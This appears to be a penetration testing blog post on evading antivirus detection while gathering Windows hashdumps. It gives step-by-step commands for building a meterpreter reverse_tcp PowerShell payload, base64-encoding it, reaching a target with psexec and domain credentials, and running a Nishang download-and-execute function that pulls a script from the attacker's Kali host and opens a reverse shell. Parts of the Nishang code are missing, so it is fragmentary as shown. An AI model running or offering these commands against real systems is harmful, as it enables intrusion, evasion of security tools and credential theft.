legal contact

avoiding AV detection

I'd like to try a more sophisticated way of gathering the hashdump.

With many thanks to:

We Need 3 machines for this

  • metasploit (Kali)
  • Windows with powershell
  • The final target (Windows Server)

On Kali:

Create a PowerShell meterpreter

msfpayload windows/meterpreter/reverse_tcp LHOST=[IP of Kali] LPORT=443 R | msfencode -t psh -a x86

On the PowerShell machine

Convert the PS meterpreter Shell to the right Format:

c:\> powershell
PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd)
PS c:\> $e = [Convert]::ToBase64String($u)
PS c:\> $e
Put this output as a file into an webserver directory on Kali and make sure you can Access/download it
Now get to the target:
c:\> psexec \\[Target] -u domain\jdoe cmd.exe
Create bewlo PS script that downloads and executes your script from Kali and executes it in Memory. (Thanks to Nishang)
function Download-Execute-PS
Nishang Payload which downloads and executes a powershell script.

This payload downloads a powershell script from specified URL and then executes it on the target.
Use the -nowdownload option to avoid saving the script on the target. Otherwise, the script is saved with a random filename.

The URL from where the powershell script would be downloaded.

.PARAMETER Arguments
The Arguments to pass to the script when it is not downloaded to disk i.e. with -nodownload function.
This is to be used when the scripts load a function in memory, true for most scripts in Nishang.

.PARAMETER Nodownload
If this switch is used, the script is not dowloaded to the disk.

PS > Download-Execute-PS

PS > Download-Execute-PS -Argument evilscript -nodownload
The above command does not download the script file to disk and executes the evilscript function inside the evilscript.ps1

    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True)]

        [Parameter(Position = 1, Mandatory = $False)]

    if ($nodownload -eq $true)
        Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL"))
            Invoke-Expression $Arguments
        $rand = Get-Random
        $webclient = New-Object System.Net.WebClient
        $file1 = "$env:temp\$rand.ps1"
        $script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1
        Invoke-Expression $pastevalue
Call this script to download and run your reverse Shell:
Download-Execute-PS http://[Kali]/ps.txt
Go to your Kali and ejoy the reverse Shell....